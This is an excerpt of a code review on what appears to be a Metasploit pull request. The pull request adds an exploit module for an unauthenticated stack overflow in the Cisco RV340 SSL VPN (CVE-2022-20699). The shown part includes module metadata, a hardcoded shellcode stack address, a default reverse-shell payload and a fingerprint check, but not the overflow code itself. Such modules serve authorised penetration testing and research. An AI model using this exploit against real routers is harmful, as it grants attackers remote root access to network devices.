modules/exploits/linux/misc/cisco_rv340_sslvpn.rb

```diff
@@ -0,0 +1,220 @@
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco RV340 SSL VPN Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits a stack buffer overflow in the Cisco RV series routers SSL VPN
+          functionality. The default SSL VPN configuration is exploitable, with no authentication
+          required and works over the Internet!
+          The stack is executable and no ASLR is in place, which makes exploitation easier.
+          Successful execution of this module results in a reverse root shell. A custom payload is
+          used as Metasploit does not have ARMLE null free shellcode.
+          This vulnerability was presented by the Flashback Team in Pwn2Own Austin 2021 and OffensiveCon
+          2022. For more information check the referenced advisory.
+          This module has been tested in firmware versions 1.0.03.15 and above and works flawlessly.
+          Only the RV340 router was tested, but other RV series routers should work out of the box.
+        },
+        'Author' => [
+          'Pedro Ribeiro <pedrib@gmail.com>', # Vulnerability discovery and Metasploit module
+          'Radek Domanski <radek.domanski[at]gmail.com>' # Vulnerability discovery and Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'References' => [
+          ['CVE', '2022-20699'],
+          ['URL', 'https://www.youtube.com/watch?v=O1uK_b1Tmts'],
+          ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Austin_2021/flashback_connects/flashback_connects.md'],
+          ['URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Austin2021/flashback_connects/flashback_connects.md'],
+          ['URL', 'https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-smb-mult-vuln-KA9PK6D.html'],
+        ],
+        'Arch' => ARCH_ARMLE,
+        # We actually use our own shellcode because Metasploit doesn't have ARM encoders!
+        'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },
+        'Targets' => [
+          [
+            'Cisco RV340 Firmware Version <= 1.0.03.24',
+            {
+              # Shellcode location on stack (rwx stack, seriously Cisco...)
+              # The same for all vulnerable firmware versions: 0x704aed98
+              'Shellcode' => "\x98\xed\x4a\x70"
+            }
+          ],
+        ],
+        'DisclosureDate' => '2022-02-02',
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(8443),
+        OptBool.new('SSL', [true, 'Use SSL', true])
+      ]
+    )
+  end
+
+  def check
+    # This should return a string like:
+    # "The Cisco AnyConnect VPN Client is required to connect to the SSLVPN server." (plus another phrase)
+    res = send_request_cgi({ 'uri' => '/login.html' })
+    if res && res.code == 200 && res.body.include?('Cisco AnyConnect VPN Client')
```

Comment:
Is there a version we can check?  A hardware device name?  This looks like it would pass any Cisco AnyConnect VPN Client.

Reply:
I think the best is to include the whole string `The Cisco AnyConnect VPN Client is required to connect to the SSLVPN server`  as SSLVPN appears to be unique to this implementation of Cisco AnyConnect.